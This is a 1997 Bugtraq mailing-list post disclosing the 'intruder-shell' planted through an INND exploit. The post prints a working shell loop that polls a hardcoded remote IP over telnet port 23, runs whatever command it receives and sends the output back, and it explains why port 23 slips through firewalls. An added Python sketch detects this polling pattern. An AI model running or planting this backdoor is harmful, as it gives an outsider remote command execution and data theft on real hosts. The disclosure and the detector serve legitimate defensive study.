[4188] in bugtraq
[INND exploit] The "intruder-shell"
daemon@ATHENA.MIT.EDU (Rikhardur Egilsson)
Tue Mar 18 20:20:14 1997
Date: Tue, 18 Mar 1997 18:14:06 +0000
Reply-To: Rikhardur Egilsson <k97161@SKYRR.IS>
From: Rikhardur Egilsson <k97161@SKYRR.IS>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <199703181624.LAA06978@feline.nrnsinc.on.ca>
The "intruder-shell" is the following /bin/sh program:
while :; do
    IN=`/bin/sleep 2 | /bin/telnet 193.12.106.100 23 2>/dev/null | /bin/tail -1`
    if [ X"$IN" != X"$OIN" ]; then
        (/bin/sleep 2; eval "$IN" 2>&1) |
            /bin/telnet 193.12.106.100 23 >/dev/null 2>&1
        OIN=$IN
    fi
    sleep 30
done
I will now try to explain how it works:
repeat(forever)
    wait 2 seconds;
    connect to port 23 on 193.12.106.100;
    put the last line of what '193.12.106.100' gives us in variable $IN
    if $IN does not equal $OIN (Old IN)
        wait 2 seconds;
        evaluate $IN as a command and send the results to '193.12.106.100'
        (e.g. $IN could be '/bin/ls -l /etc')
        assign the value of $IN to $OIN
    end // if
    wait 30 seconds
end // repeat
The port '23' is by no means a 'randomly chosen port'.
It is chosen because, even if most ports to/from a site are blocked
with a router/firewall, port 23 is very often allowed to connect to
the outside world.
The reason? Port 23 is the 'telnet' port, i.e. if a domain allows
telnet connections out from its news-server we're in luck!
--
rikardur@skyrr.is - Skyrr Ltd - Iceland Information Management
Rikhardur Egilsson - System Programmer - UNIX Admin - Tel : +354-5695100
Armuli 2 - IS-108 Reykjavik - Iceland - Fax : +354-5695251
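
Added example, not part of the original post: a detection sketch for the traffic pattern the loop above produces, i.e. many short outbound port-23 connections from one host at a near-constant interval, as opposed to a person's long interactive telnet session. The flow-record format, the thresholds and the documentation-range addresses are assumptions made for this example.

```python
import statistics
from collections import defaultdict

# Constructed flow records: "epoch_seconds src dst dport duration_seconds"
SAMPLE_FLOWS = """\
1000 192.0.2.10 198.51.100.7 23 2
1032 192.0.2.10 198.51.100.7 23 2
1064 192.0.2.10 198.51.100.7 23 2
1066 192.0.2.10 198.51.100.7 23 3
1099 192.0.2.10 198.51.100.7 23 2
1131 192.0.2.10 198.51.100.7 23 2
1163 192.0.2.10 198.51.100.7 23 2
1010 192.0.2.20 198.51.100.9 23 840
1500 192.0.2.20 198.51.100.9 23 1200
4000 192.0.2.20 198.51.100.9 23 95
"""

def parse_flows(text):
    """Group connection start times and durations by (src, dst, dport)."""
    groups = defaultdict(list)
    for line in text.splitlines():
        fields = line.split()
        if len(fields) != 5:
            continue  # skip blank or malformed records
        ts, src, dst, dport, dur = fields
        groups[(src, dst, int(dport))].append((float(ts), float(dur)))
    return groups

def find_pollers(text, min_conns=5, max_dur=10.0, tolerance=0.15, min_regular=0.6):
    """Return (src, dst, dport, period) for flows that look like a polling loop:
    many short connections whose start-to-start gaps cluster around one period."""
    hits = []
    for (src, dst, dport), conns in sorted(parse_flows(text).items()):
        conns.sort()
        if len(conns) < min_conns:
            continue
        # An interactive telnet session lasts minutes; the loop's last seconds.
        if statistics.median(d for _, d in conns) > max_dur:
            continue
        gaps = [b[0] - a[0] for a, b in zip(conns, conns[1:])]
        period = statistics.median(gaps)
        regular = [g for g in gaps if abs(g - period) <= tolerance * period]
        # Tolerate the extra back-to-back connection made when output is sent.
        if period > 0 and len(regular) / len(gaps) >= min_regular:
            hits.append((src, dst, dport, period))
    return hits

if __name__ == "__main__":
    for src, dst, dport, period in find_pollers(SAMPLE_FLOWS):
        print(f"{src} -> {dst}:{dport} polls every ~{period:.0f}s")
```

On the constructed sample, only the first host is reported; the second host's three long sessions are ignored.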